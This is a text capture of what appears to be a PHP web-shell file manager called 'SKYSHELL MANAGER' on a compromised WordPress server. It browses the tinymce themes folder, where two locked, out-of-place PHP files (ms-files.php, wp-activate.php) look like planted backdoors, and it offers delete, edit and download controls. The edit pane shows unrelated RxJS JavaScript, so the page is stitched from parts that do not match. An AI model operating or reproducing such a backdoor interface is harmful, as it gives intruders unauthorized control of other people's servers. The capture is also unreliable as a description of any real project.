📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: firstValueFrom.js
import { EmptyError } from './util/EmptyError'; import { SafeSubscriber } from './Subscriber'; export function firstValueFrom(source, config) { const hasConfig = typeof config === 'object'; return new Promise((resolve, reject) => { const subscriber = new SafeSubscriber({ next: (value) => { resolve(value); subscriber.unsubscribe(); }, error: reject, complete: () => { if (hasConfig) { resolve(config.defaultValue); } else { reject(new EmptyError()); } }, }); source.subscribe(subscriber); }); } //# sourceMappingURL=firstValueFrom.js.map
Save